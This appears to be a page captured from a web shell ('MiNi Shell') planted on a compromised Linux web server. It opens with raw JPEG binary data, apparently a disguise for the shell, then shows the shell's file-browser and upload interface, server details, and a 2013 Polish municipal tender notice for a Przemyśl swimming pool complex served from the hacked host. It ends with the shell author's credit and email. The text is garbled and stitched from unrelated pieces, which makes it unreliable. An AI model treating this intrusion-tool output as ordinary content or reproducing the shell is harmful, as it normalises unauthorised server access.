JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/391640-N-2013.html

<p class="kh_header"><b>Przemyśl: Budowa  basenu wraz z infrastrukturą towarzyszącą przy ul. Sanockiej w Przemyślu - opracowanie koncepcji zagospodarowania terenu i programu funkcjonalno-użytkowego.</b><br>
<b>Numer ogłoszenia: 391640 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  basenu wraz z infrastrukturą towarzyszącą przy ul. Sanockiej w Przemyślu - opracowanie koncepcji zagospodarowania terenu i programu funkcjonalno-użytkowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
1.Przedmiotem zamówienia jest opracowanie wielobranżowej koncepcji funkcjonalno-przestrzennej  zagospodarowania całości terenu położonego przy ul. Sanockiej w Przemyślu (o którym mowa w dalszej części SIWZ) oraz programu funkcjonalno-użytkowego w celu zaprojektowania i wybudowania krytej pływalni i kompleksu basenów   zewnętrznych wraz z zagospodarowaniem terenu na potrzeby krytej pływalni i kompleksu basenów zewnętrznych. 
2.Celem realizacji przedmiotu zamówienia jest:
1) uzyskanie najlepszego rozwiązania fukcjonalno- przestrzennego zagospodarowania wskazanego terenu przy ul. Sanockiej w Przemyślu pod względem  funkcji terenu, sposobu zagospodarowania i rozwiązań komunikacyjnych,
2) kreacja właściwego ładu przestrzennego w ścisłym powiązaniu walorami krajobrazowymi, środowiskowymi i przyrodniczymi umożliwiającego zrównoważony rozwój terenów wypoczynkowych i rekreacyjno-turystycznych,
3) stworzenie atrakcyjnej oferty inwestycyjnej dla terenu obejmującego zakres przedmiotowy  koncepcji
4) stworzenie atrakcyjnego miejsca rekreacji i wypoczynku dla mieszkańców miasta i regionu.
3.Zaleca się dokonanie wizji lokalnej  w celu uwzględnienia wszystkich uwarunkowań mających istotny wpływ na kształtowanie ceny ofert, jak również zaproponowanych rozwiązań projektowych koncepcji.

4. Szczegółowy  opis przedmiotu zamówienia:
4.1. Przedmiotem zamówienia jest opracowanie koncepcji zagospodarowania terenu położonego przy ul. Sanockiej  w Przemyślu na działkach nr 192/2, 192/1, 196/1, 196/3, 197/1, 197/2, 197/4 w obr. 206 m. Przemyśl,  zawierającej usytuowanie obiektów: krytej pływalni, kompleksu basenów zewnętrznych, hali sportowo - widowiskowej, ośrodka SPA, lodowiska i hotelu uwzględniającej:
a).	optymalne wykorzystanie terenu,
b).	rozwiązania komunikacyjne pomiędzy poszczególnymi obiektami,
c).	uzbrojenie terenu w niezbędną infrastrukturę techniczną potrzebną dla w/w obiektów,
d).	oświetlenie terenu,
e).	gospodarkę zielenią,
f).	małą architekturę.
Zamawiający oczekuje opracowania trzech wariantów koncepcji zagospodarowania terenu w/w obiektami.
4.2. Zamawiający dopuszcza możliwość zmiany lokalizacji użytkowanego lodowiska w ramach wskazanego terenu szczególnie w przypadku gdy obecna lokalizacja lodowiska uniemożliwia lokalizację  funkcji niezbędnych do prawidłowego funkcjonowania rozwiązań  projektowanego programu funkcjonalnego dla zagospodarowania terenu. 
4.3. opracowanie winno uwzględniać obowiązujące normy, przepisy prawa i inne dokumenty w szczególności wynikające z:
a) ustawy z dnia 27 marca 2003r. o planowaniu przestrzennym i zagospodarowaniu przestrzennym (tj. Dz.U. z 2012r. poz.647 z późn. zm. )
b) ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2010r. nr 243 poz. 1623 z późn. zm. )
c) innych dokumentów w tym m.innymi;
- uchwały Rady Miejskiej w Przemyślu Nr 38/2010 z dnia 29 grudnia 2010r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego SANOCKA I z mapą poglądową z ustaleniami mpzp opublikowanej w Dzienniku Urzędowym Województwa Podkarpackiego Nr 10, poz. 26 z dnia 31.01.2011r. stanowiącej załącznik do SIWZ, 
d) materiałami udostępnionymi do opracowania koncepcji oprócz ww. uchwały jest również kopia mapy zasadniczej w skali 1:100 oraz wypisy z rejestru gruntów dla ww. terenu.
4.4.  Każda koncepcja ma zawierać cześć opisową i graficzną i ma być  opracowana na osobnej mapie zasadniczej w formie:
a) papierowej - 2 egzemplarze dla każdego wariantu
b) elektronicznej w PDF na płycie CD lub DVD - 2 szt. 

5. Przedmiotem zamówienia jest również opracowanie Programu Funkcjonalno-Użytkowego w celu zaprojektowania i wybudowania krytej pływalni i kompleksu basenów zewnętrznych, objętych zakresem opracowanej koncepcji zagospodarowania.  Program Funkcjonalno Użytkowy ma być opracowany m. innymi zgodnie z obowiązującym rozporządzeniem Ministra Infrastruktury z dnia  2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych  oraz  programu funkcjonalno-użytkowego  (Dz.U. z 2004r. Nr 202, poz. 2072 z późn. zm.)
Dla potrzeb programu funkcjonalno-użytkowego założono, że:
-kryta pływalnia i baseny zewnętrzne będą zasilane wodą z miejskiego ujęcia wody,
-ogólna powierzchnia lustra krytej pływalni będzie wynosiło około 700-900 m2 (w tym trzy tory pływackie o dł. 25 m),
-głównym obiektem będzie budynek krytej pływalni obejmującym baseny rekreacyjne   i trzy tory pływackie o dł. 25 m,
-baseny rekreacyjne będą wyposażone w różne atrakcje takie jak np,: zjeżdżalnie masaże, fontanny, wodospady,  brodziki dla dzieci itp.
-w budynku krytej pływalni zlokalizowane będą również inne atrakcje towarzyszące takie jak np. sauny, solaria, fitness itp. oraz zaplecze gastronomiczne,
-w budynku krytej pływalni zlokalizowane będą pomieszczenia socjalno-administracyjne, takie jak m.in.: szatnie-przebieralnie, toalety, prysznice  i umywalnie, kasy itp.
-baseny zewnętrzne będą basenami rekreacyjnymi dla dorosłych i dzieci o ogólnej powierzchni około 700-1000 m2 ,
-w ramach basenów zewnętrznych zostanie wykonany wodny plac zabaw oraz miejsca do leżakowania, 
-na potrzeby krytej pływalni i basenów zewnętrznych zostanie wykorzystany istniejący parking przy dolnej stacji wyciągu narciarskiego - w tym celu należy rozwiązać układ komunikacyjny dostosowany do lokalizacji zaproponowanej każdej z koncepcji zagospodarowania terenu,
Proponowany program inwestycyjny dla krytej pływalni i basenów zewnętrznych ma formułę otwartą. Zamawiający oczekuje, że Wykonawca przedłoży szczegółowe rozwiązania dotyczące programu inwestycyjnego jak i rozwiązań materiałowych stosowanych obecnie  w tego typu obiektach.
Program funkcjonalno-użytkowy dla krytej pływalni i basenów zewnętrznych ma zawierać:
a).	część rysunkową wykonaną w skali 1:100 lub 1:50 obejmującą zagospodarowanie terenu, rzuty poziome planowanych obiektów wraz z proponowanymi wymiarami,
b).	lokalizację sieci zewnętrznych i urządzeń zewnętrznych niezbędnych do funkcjonowania obiektów ma być dostosowana do lokalizacji krytej pływalni i basenów zewnętrznych zaproponowanych w każdej koncepcji,
c).	część opisową - w programie muszą zostać przedstawione rozwiązania techniczne  i technologiczne zgodne z najnowszymi trendami proekologicznymi gwarantującymi niezawodność funkcjonowania obiektów. Wykonawca musi przedłożyć propozycję rozwiązań materiałowych odnoszących się do wszystkich elementów obiektów, wykończenia poszczególnych pomieszczeń, instalacji wewnętrznych oraz sieci zewnętrznych  ( w tym m.in. konstrukcji dachu, ścian, niecek basenowych, instalacji wewnętrznych i zewnętrznych, podłóg, stolarki okiennej i drzwiowej, wyposażenia, systemu uzdatniania wody, klimatyzacji i wentylacji, systemu grzewczego, elektronicznego systemu obsługi klienta) oraz zagospodarowania terenu. Opis zawierać ma również informację o liczbie zatrudnionych w obiektach stanowiących niezbędną obsługę, informację o powierzchniach poszczególnych pomieszczeń   i elementów obiektów oraz wykaz wyposażenia poszczególnych pomieszczeń obiektów. Wykonawca musi założyć dwu etapową realizację inwestycji. Pierwszy etap obejmować ma realizację basenów zewnętrznych, drugi - krytą pływalnię.
W tym celu Wykonawca musi przewidzieć niezależne funkcjonowanie ( oddanie do użytkowania ) obu obiektów.
d).	część finansową -  Wykonawca musi przedłożyć przynajmniej w dwóch wariantach analizę finansową odnoszącą się do realizacji inwestycji i późniejszej eksploatacji obiektów. Analiza finansowa dotycząca wykonawstwa obejmować ma koszty realizacji inwestycji zależne od zastosowanych materiałów i technologii. Analiza dotycząca eksploatacji obiektu odnosić się ma do zakładanych przychodów oraz kosztów utrzymania obiektu. Analiza finansowa dotycząca kosztów realizacji inwestycji i kosztów eksploatacji musi być sporządzona dla każdego etapu osobno. 
e).	niezbędne wymagane Prawem Budowlanym uzgodnienia.
f).	wizualizację obiektów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.24.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną  usługę o wartości nie mniejszej niż 50.000,00 zł. odpowiadającą  swoim rodzajem i wartością usłudze objętej przedmiotem zamówienia tj. wykonanie  jednej koncepcji lub programu  funkcjonalno-użytkowego lub dokumentacji projektowej na budowę  obiektu sportowo-rekreacyjnego (np. baseny, parki wodne, hale sportowe)  potwierdzone dowodami wydanymi przez podmiot na rzecz którego zostało wykonane, że usługi te zostały wykonane w sposób należyty oraz wskazującymi że zostały wykonane zgodnie z zasadami konserwacji dzieł sztuki  i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia niezbędne do wykonania przedmiotu zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane - tj. uprawnienia budowlane wg. rozporządzenia Ministra Transportu i Budownictwa    z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz.U. Nr 83 poz. 578 z późn. zm.) 
w zakresie projektowania, kierowania robotami budowlanymi  tj:

1) min. 1 osoba z uprawnieniami do projektowania bez ograniczeń w branży architektonicznej  pełniąca jednocześnie funkcję kierownika projektu, 
1) min. 1 osoba z uprawnieniami do projektowania bez ograniczeń w branży konstrukcyjno-budowlanej 
2) min. 1 osoba z uprawnieniami do projektowania w branży instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń ,
3) min. 1 osoba z uprawnieniami do projektowania  w branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik Nr 2 do SIWZ 
1) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze.
2)  pełnomocnictwo o którym mowa w pkt.5 ppkt1.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych i określonych w niniejszej umowie.
2. Strony dopuszczają możliwość zmiany postanowień umowy:
  a) w zakresie wydłużenia terminu obowiązywania umowy pod warunkiem że: 
      - zaszła konieczność wykonania prac dodatkowych, których wykonanie w sposób  obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy,
      - prace objęte umową zostały wstrzymane przez właściwe organy z przyczyn 
        niezależnych od Wykonawcy,
      - zaszła konieczność uzyskania niemożliwych do przewidzenia na etapie zawarcia  umowy danych, uzgodnień bądź pozwoleń osób trzecich lub właściwych organów,przedłużenia procedury przetargowej, zmiany terminu realizacji prac projektowych pod warunkiem, że przyczyna powodująca konieczność  zmiany terminu leży po stronie Zamawiającego
b) w zakresie zmniejszenia przedmiotu zamówienia pod warunkiem, że z niemożliwych do przewidzenia na etapie dokonywania uzgodnień, zawarcia umowy przyczyn wykonanie całości przedmiotu umowy napotyka, stałe trudności i których usunięcie wymaga poniesienia znacznych kosztów. 
c)w zakresie zmiany osób mających wykonywać zamówienie, wskazanych w ofercie (pod warunkiem, że wskazane nowe osoby posiadają wymagane uprawnienia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl   BIP zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemyślu,
Wieloosobowe Stanowisko ds. Zamówień Publicznych
ul. Ratuszowa 10A 37-700 Przemyśl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 10:00, miejsce: Urząd Miejski w Przemyślu,
Wieloosobowe Stanowisko ds. Zamówień Publicznych
ul. Ratuszowa 10A 
37-700 Przemyśl.
pok.205.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com